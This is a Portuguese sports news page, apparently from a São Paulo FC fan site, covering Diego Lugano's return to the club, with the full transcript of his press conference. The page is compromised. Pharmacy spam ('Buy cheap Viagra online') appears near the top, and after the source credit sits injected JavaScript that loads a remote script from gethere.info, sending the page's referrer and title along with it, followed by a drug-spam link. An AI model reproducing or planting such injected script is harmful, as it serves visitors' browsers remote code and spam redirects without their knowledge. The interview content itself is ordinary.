Sem categoria

Lugano veste “manto sagrado” e diz que volta é retribuição ao São Paulo

pills store

Buy cheap Viagra online

Depois de quase 10 anos, Diego Lugano voltou à sala de imprensa do CT da Barra Funda. Falou com a responsabilidade de ser um símbolo do São Paulo. E de simbolizar tudo aquilo que o clube espera reconquistar com uma série de mudanças capitaneadas por seu retorno. Falou com emoção de retornar ao time que ganhou seu coração. Foi o coração, aliás, quem falou.

– É um prazer, uma alegria, uma emoção e uma linda responsabilidade voltar a vestir o manto sagrado – disse o zagueiro, antes mesmo da primeira pergunta dos jornalistas.

Aos 35 anos, dono de uma carreira vencedora, ele carrega nas costas a missão de transformar o Tricolor, muito mais fora de campo do que dentro. Não se sabe quando ele vai estrear nem se será titular, tampouco se seu desempenho estará à altura das pretensões do São Paulo na temporada. Mas a confiança de que haverá dias melhores com Lugano domina os torcedores.

– O São Paulo hoje atravessa uma fase de transição, o Rogério é o maior jogador da história desse clube. A diretoria entendeu que posso colaborar, e não posso dar as costas a todo esse povo que vê em mim um cara que pode colaborar – afirmou Lugano, que também confirmou ter rejeitado propostas de outros clubes brasileiros ao longo dos últimos 10 anos.

– Foi o jeito de ser grato à torcida e ao clube que me trouxe com 21 anos. Eu cheguei à seleção uruguaia graças ao São Paulo, tive uma vida profissional graças ao São Paulo, minha família tem uma vida muito boa graças ao São Paulo. Era o mínimo que eu poderia fazer.

Leia abaixo a íntegra da entrevista de Diego Lugano:

PRONUNCIAMENTO INICIAL

– Desculpem pelo meu português, que nunca foi bom e agora está pior ainda. É uma alegria, uma emoção e uma linda responsabilidade voltar a vestir o manto sagrado. A emoção é a mesma de quando cheguei 13 anos atrás. Tenho um carinho enorme pelo São Paulo, pela instituição, pelos dirigentes. É a última fase da minha carreira e quero ajudar, quero ser eu mesmo.

CONVERSA COM O TREINADOR

– Com Bauza, conversamos obviamente quais eram meus desejos e ambições para a minha carreira, além de querer saber do meu estado físico. Mostrei o quanto estava preparado.

DESPEDIDA DE CENI

– Foi incrível, algo emocionante. Primeiro por como o Rogério fez aquela festa, com jogadores históricos do São Paulo. Vi colegas, caras da antiga geração muito emocionados. Obviamente já tinha na cabeça que poderia existir a possibilidade de voltar. Não poderia dar as costas para a minha história aqui. Estou aqui para colaborar.

RECUSOU OUTROS CLUBES BRASILEIROS?

– O dia que fui embora daqui, por tudo que vivi, sempre falei que no Brasil só jogaria no São Paulo. Em junho, o São Paulo não precisava de mim, era algo muito simples de entender. Sou muito grato ao São Paulo. Cheguei à seleção do Uruguai graças ao São Paulo. Minha família tem uma vida boa graças ao São Paulo. A maneira de retribuir era sendo fiel.

ESTÁ SATISFEITO COM SUA CONDIÇÃO TÉCNICA?

– Os últimos anos foram complicados, com algumas contusões difíceis, principalmente na época da Copa. Naquela época existia uma chance de voltar ao São Paulo, mas não me sentia pronto para voltar ao calendário assassino do futebol brasileiro. Não vim aqui para passear, quero corresponder a todos que confiam em mim.
– Obviamente que o calendário do futebol brasileiro é maluco. Mas eu quero ser mais um dentro do elenco, ajudar, jogar quando o treinador precisar. Quando não, quero ser positivo e ajudar.


ESTARÁ À DISPOSIÇÃO PARA ESTREIA NA LIBERTADORES?

– Estou fazendo agora um trabalho de reequilíbrio muscular para que não tenha problemas para a frente. Perdemos tempo na última semana e temos que recuperar agora. Não sei quando estarei pronto futebolisticamente, isso é a comissão técnica que determinará. Na próxima semana, já poderei fazer um trabalho de campo.

TORCIDA VAI ENTENDER QUANDO FOR RESERVA?

– Isso é subestimar a inteligência do torcedor. Ele sabe que um jogador de 35 anos não é o mesmo de 23. Sabe o que esperar de mim. Poderia estar em uma liga menos competitiva e longe, mas estou aqui porque gosto de desafios. É um compromisso que gostaria de ter.”

SOBRE O PESO

– Estou um pouco abaixo, mas acima de tudo preciso fazer um trabalho de reequilíbrio muscular. Mas isso não tem nenhum segredo.

QUE LUGANO ESTÁ VOLTANDO?

– Como esportista, são vocês que vão analisar de acordo com o que fizer dentro de campo.

FALTA DE RAÇA DO ELENCO EM 2015

– Uma coisa que me motivou voltar aqui ao São Paulo é a certeza que tem um elenco de muita qualidade. Aqui temos o campeonato mais equilibrado do mundo. Se com todas as dificuldades que tivemos no ano passado, conseguimos classificar para a Libertadores é porque o elenco tem qualidade. Estou ansioso para trabalhar com eles, ir crescendo no dia a dia. Quando você veste essa camisa, o objetivo tem de ser sempre o mais alto possível.

LIDERANÇA

– Ninguém escolhe o líder. O grupo é que escolhe. O que posso dizer é que estou aqui para trabalhar, para ser mais um. Existe uma diferença de ser capitão de uma seleção e em um clube. Na seleção, você tem um país por trás, qualquer coisa tem repercussão, muita consequência. No clube, você está mais no dia a dia. O segredo é manter uma linha de conduta e trabalhar com honestidade e compromisso.

MUDANÇA DE STATUS NA CARREIRA

– Você vai trabalhando atrás dos seus sonhos e vai trilhando seu caminho. Quando vim ao Brasil, vim com muita ambição, assim como venho agora. Você não pode nunca se achar grande na vitória ou se diminuir na derrota, deve ser sempre o mesmo.

POR QUÊ NÃO QUIS FESTA?

– Depois do que foi a chegada no aeroporto, foi tão intenso, tudo que viesse depois já ficaria exagerado. Esse momento da chegada marcou muito. Torcida são-paulina está marcando uma diferença no Brasil, mostra que tem lembrança, que tem gratidão. Essa é uma mensagem linda. Agora é tempo de trabalhar, de crescer e de ajudar meus companheiros.

ACOMPANHAVA O SÃO PAULO DE LONGE?

– Quando cheguei aqui em 2003, o clube vivia uma fase muito ruim, de quatro anos sem título. Futebol são fases, ainda mais em lugares competitivos. Obviamente que acompanhei, sei o que aconteceu. São Paulo ainda é visto no mundo todo como um modelo de administração. Confio no São Paulo, confio na instituição.

APOSENTADORIA DE ROGÉRIO CENI

– A saída do Rogério Ceni é uma mudança histórica, é algo muito significativo. É um cara insubstituível. É impossível. Mas tenho a responsabilidade de fazer parte dessa mudança, de ajudar nesse momento. Chego para assumir a pressão, assumir a responsabilidade, botar o peito na frente e, assim, procurar ajudar dentro de campo.

ESTÁ PRONTO PARA SER CAMPEÃO E COMANDAR O TIME?

– Meu último jogo pelo São Paulo foi uma derrota na final da Libertadores (contra o Inter, em 2006). O São Paulo tem uma camisa pesada e todos os times grandes estão na edição deste ano. Será algo de gente grande. O mais importante será o começo, torcedor terá de ter paciência com o treinador estrangeiro, com a equipe que está sendo montada.

INVICTO CONTRA CORINTHIANS E PALMEIRAS

– Isso aconteceu porque tinha grandes companheiros. Não fui eu que não perdi, aquele elenco não perdeu. Tomara que a gente comece a ter de novo essa sequência vitoriosa. Que possamos ter um time com muito compromisso, com fome de glória. Minha expectativa é voltar a ser campeão aqui no São Paulo.

KAKÁ É INSPIRAÇÃO?

– Sempre se fala que a segunda passagem não é igual à primeira. Ele serve de inspiração, sim. Tem o risco, mas que fica em quinto plano quando tem um clube e uma torcida que precisam de você. Se não for como a gente sonhou, não será por falta de trabalho.

Fonte: Ges.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; buy a at an easy rate medications on line – http://masspremiersoccer.com/2016/11/30/buy-a-at-an-easy-rate-medications-on-line/

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

catorze + treze =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Sem categoria

Mais em Sem categoria

São Paulo quer evitar “gols bobos” para aliviar pressão sobre defesa

saopauloadmin5 de março de 2017

Chapecoense

saopauloadmin29 de novembro de 2016

Membros de organizada depõem sobre invasão ao CT do São Paulo

saopauloadmin30 de agosto de 2016

Neto: “Pato se apresenta semana que vem ao São Paulo”

saopauloadmin22 de julho de 2016

De folga na arquibancada, campeão do mundo vibra com o São Paulo

saopauloadmin6 de abril de 2016

São Paulo empata com o River Plate pela Libertadores e está vivo

saopauloadmin11 de março de 2016

Algoz de rival na base assina primeiro contrato com o São Paulo

saopauloadmin27 de janeiro de 2016

Monstro na área!

saopauloadmin21 de janeiro de 2016

Kardec é apontado como novo líder e sucessor de Ceni

saopauloadmin8 de janeiro de 2016